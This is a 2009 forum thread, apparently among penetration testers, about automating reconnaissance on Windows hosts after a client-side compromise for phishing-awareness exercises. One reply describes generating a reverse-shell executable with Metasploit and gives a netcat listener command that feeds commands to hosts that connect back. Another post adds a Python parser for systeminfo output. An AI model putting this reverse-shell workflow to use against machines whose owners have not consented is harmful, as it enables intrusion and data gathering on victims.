Andrew Waite
« on: August 10, 2009, 01:24:12 PM » |
Hi All,
I'm looking for a method to automatically gather system/user information post compromise. I've used DarkOperator's winenum meterpreter script, but I don't fancy having to stare intently at a box waiting for compromised systems to connect back to my server to initiate info gathering.
More information would always be better, but initially a minimum would be the system and username of the compromised account for client-side/user awareness stuff. Not too concerned at this point whether it is via a (free) framework (Metasploit etc.) or a standalone solution. I know Assagai is in the pipeline, which sounds like it should handle my requirements, but I haven't seen any release date information yet.
Don't think for a second I'm dealing with anything innovative or unique, so I'm wondering how others deal with the same scenario.
Thanks in advance, Andrew
Ketchup
« Reply #1 on: August 10, 2009, 02:23:36 PM » |
Andrew, do you mean something like the MIRROR incident response toolset? http://mirror.codeplex.com/
Jhaddix
« Reply #2 on: August 10, 2009, 03:07:27 PM » |
Hmm... I thought Assagai was a phishing framework, I'll have to re-look into that project.
Depending on your scope you could just cmd.exe > batch script something, couldn't you?
I mean, that's all MIRROR is but with Sysinternals tools built in...
UNIX
« Reply #3 on: August 11, 2009, 12:16:21 AM » |
If I remember correctly, I too think that Assagai was some kind of Phishing Framework.
MIRROR should be able to do what you want.
If you don't care and have some time to spend, maybe you could write such a program in Python, which shouldn't be too hard.
Andrew Waite
« Reply #4 on: August 11, 2009, 04:33:29 AM » |
Hi guys,
Thanks for the responses. You're right, Assagai is supposedly going to be a phishing framework, but from the little I've read about it, it should have some decent tracking and metric capabilities built in.
To expand a little on what I'm toying with, I'm looking at a way to track and record which users clicked the link, or opened the attachment, or did 'other bad stuffs'.
Batch scripting cmd.exe shells was the first thing that sprung to mind, but I didn't want to re-invent the wheel if it had already been done. I don't have any real world experience with MIR-ROR, didn't think it would be that simple to tie into the client's connection back. Looks like I'll need to re-evaluate and give it a closer look.
Andrew
Andrew Waite
« Reply #5 on: August 11, 2009, 03:18:48 PM » |
I've been playing with this some more after getting home from work.
Decided to go down the automated cmd route, which turned out to be simpler than I had expected. For testing purposes I've used Metasploit's msfpayload to generate a Windows executable returning a reverse cmd shell. On the listening side I've simply got a netcat listener, feeding in a text file containing commands to run once the connection is established:

# nc -vnlp 4444 < commands.txt

I still need to decide exactly which commands I want to run to gather which data, and how I want to distribute my shellcode to unsuspecting guinea pigs.
Thanks for the assistance and suggestions.
Andrew Waite
« Reply #7 on: August 12, 2009, 10:23:02 AM » |
Sounds like just the thing, cheers Dale, much appreciated.
Jhaddix
« Reply #8 on: August 12, 2009, 02:12:58 PM » |
While that script is awesome, it could use the systeminfo command; it returns a plethora of information that is useful. Example:

C:\Documents and Settings\Ender>systeminfo

Host Name:                 DESKTOP
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Jason
Registered Organization:
Product ID:
Original Install Date:     6/13/2010, 12:00:44 AM
System Up Time:            0 Days, 4 Hours, 19 Minutes, 37 Seconds
System Manufacturer:       GBT___
System Model:              NVDAACPI
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 15 Model 75 Stepping 2 AuthenticAMD ~2211 Mhz
BIOS Version:              GBT - 42302e31
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT-08:00) Pacific Time (US & Canada)
Total Physical Memory:     3,327 MB
Available Physical Memory: 2,409 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 1,997 MB
Virtual Memory: In Use:    51 MB
Page File Location(s):     D:\pagefile.sys
Domain:                    SHARE
Logon Server:              \\DESKTOP
Hotfix(s):                 115 Hotfix(s) Installed.
                           [01]: File 1 [02]: File 1 [03]: File 1 [04]: File 1 [05]: File 1 [06]: File 1 [07]: File 1 [08]: File 1 [09]: File 1 [10]: File 1
                           [11]: File 1 [12]: File 1 [13]: File 1 [14]: File 1 [15]: File 1 [16]: File 1 [17]: File 1 [18]: File 1 [19]: File 1 [20]: File 1
                           [21]: File 1 [22]: File 1 [23]: File 1 [24]: File 1 [25]: File 1 [26]: File 1 [27]: File 1 [28]: File 1 [29]: File 1 [30]: File 1
                           [31]: File 1 [32]: File 1 [33]: File 1 [34]: File 1 [35]: File 1 [36]: File 1 [37]: File 1 [38]: File 1 [39]: File 1 [40]: File 1
                           [41]: File 1 [42]: File 1 [43]: File 1 [44]: File 1 [45]: File 1 [46]: File 1 [47]: File 1 [48]: File 1 [49]: File 1 [50]: File 1
                           [51]: File 1 [52]: Q147222 [53]: Q954430 [54]: IDNMitigationAPIs - Update [55]: NLSDownlevelMapping - Update
                           [56]: KB929399 [57]: KB952069_WM9 [58]: KB973540_WM9 [59]: KB936782_WMP11 [60]: KB939683
                           [61]: KB954154_WM11 [62]: KB959772_WM11 [63]: KB941569 [64]: KB938127-v2-IE7 - Update [65]: KB969897-IE7 - Update
                           [66]: KB972260-IE7 - Update [67]: MSCompPackV1 - Update [68]: KB898461 - Update [69]: KB923561 - Update [70]: KB938464-v2 - Update
                           [71]: KB946648 - Update [72]: KB950760 - Update [73]: KB950762 - Update [74]: KB950974 - Update [75]: KB951066 - Update
                           [76]: KB951376-v2 - Update [77]: KB951748 - Update [78]: KB951978 - Update [79]: KB952004 - Update [80]: KB952287 - Update
                           [81]: KB952954 - Update [82]: KB954459 - Update [83]: KB954550-v5 - Update [84]: KB954600 - Update [85]: KB955069 - Update
                           [86]: KB955839 - Update [87]: KB956572 - Update [88]: KB956744 - Update [89]: KB956802 - Update [90]: KB956803 - Update
                           [91]: KB957097 - Update [92]: KB958644 - Update [93]: KB958687 - Update [94]: KB959426 - Update [95]: KB960225 - Update
                           [96]: KB960803 - Update [97]: KB960859 - Update [98]: KB961118 - Update [99]: KB961371 - Update [100]: KB961373 - Update
                           [101]: KB961501 - Update [102]: KB967715 - Update [103]: KB968389 - Update [104]: KB968537 - Update [105]: KB969897 - Update
                           [106]: KB969898 - Update [107]: KB970238 - Update [108]: KB971557 - Update [109]: KB971633 - Update [110]: KB971657 - Update
                           [111]: KB973346 - Update [112]: KB973354 - Update [113]: KB973507 - Update [114]: KB973815 - Update [115]: KB973869 - Update
NetWork Card(s):           5 NIC(s) Installed.
                           [01]: 1394 Net Adapter
                                 Connection Name: 1394 Connection
                           [02]: NVIDIA nForce Networking Controller
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.1.1
                                 IP address(es)
                                 [01]: 192.168.1.56
                           [03]: VMware Virtual Ethernet Adapter for VMnet1
                                 Connection Name: VMware Network Adapter VMnet1
                           [04]: VMware Virtual Ethernet Adapter for VMnet8
                                 Connection Name: VMware Network Adapter VMnet8
                           [05]: Cisco AnyConnect VPN Virtual Miniport Adapter for Windows
                                 Connection Name: Cisco AnyConnect VPN Client Connection

C:\Documents and Settings\Ender>
« Last Edit: August 13, 2009, 02:57:00 PM by Jhaddix »
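An added example, not part of Jason's post or of any tool named in the thread: a Python parser for the systeminfo output above that reduces a full dump to the handful of fields the awareness exercise needs (host, registered owner, domain, logon server, installed hotfixes, the box's own IP addresses). It assumes the output has already been decoded to text (systeminfo prints in the console code page, so decode the bytes with that code page first); the sample below is constructed from the post and trimmed.

```python
import re

# Constructed sample modelled on the systeminfo output quoted in Reply #8 (trimmed; not a real host).
SAMPLE = r"""Host Name:                 DESKTOP
OS Name:                   Microsoft Windows XP Professional
Registered Owner:          Jason
Domain:                    SHARE
Logon Server:              \\DESKTOP
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: Q147222
                           [02]: KB958644 - Update
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: NVIDIA nForce Networking Controller
                                 DHCP Server:     192.168.1.1
                                 IP address(es)
                                 [01]: 192.168.1.56
"""

HOTFIX_RE = re.compile(r"\[\d+\]:\s+(\S+)")                     # "[52]: Q147222" -> Q147222
IP_RE = re.compile(r"\[\d+\]:\s+(\d{1,3}(?:\.\d{1,3}){3})\s*$")  # "[01]: 192.168.1.56" only, not the DHCP server line

def parse_systeminfo(text):
    """Top-level 'Key: value' fields; indented continuation lines (hotfix
    and NIC entries) are kept as a list under '<Key> [items]'."""
    record, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line[0].isspace():                      # indented: item of the last key
            if current is not None:
                record.setdefault(current + " [items]", []).append(line.strip())
        elif ":" in line:                          # key starts in column 0
            key, value = line.split(":", 1)
            current = key.strip()
            record[current] = value.strip()
    return record

def summarize(text):
    """Reduce a systeminfo dump to what the awareness tracker needs."""
    rec = parse_systeminfo(text)
    items = lambda k: rec.get(k + " [items]", [])
    return {
        "host": rec.get("Host Name", ""),
        "os": rec.get("OS Name", ""),
        "owner": rec.get("Registered Owner", ""),
        "domain": rec.get("Domain", ""),
        "logon_server": rec.get("Logon Server", ""),
        "hotfixes": [m.group(1) for l in items("Hotfix(s)") if (m := HOTFIX_RE.match(l))],
        "ips": [m.group(1) for l in items("NetWork Card(s)") if (m := IP_RE.match(l))],
    }
```

Fields such as "Virtual Memory: Max Size" contain a second colon and are split on the first one, so they collapse into a single "Virtual Memory" key; the fields the tracker uses are unaffected.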
Andrew Waite
« Reply #9 on: August 13, 2009, 04:08:34 AM » |
Thanks Jason, I'll be adding that to my toolbox. Looks like it grabs most of what I'm looking for in one simple command.
LSOChris
« Reply #10 on: September 05, 2009, 08:35:53 AM » |
If you are going to use Metasploit you might as well just write your own meterpreter script to do it, even if it's as simple as pushing up your batch script and running it... even though writing to disk should be avoided.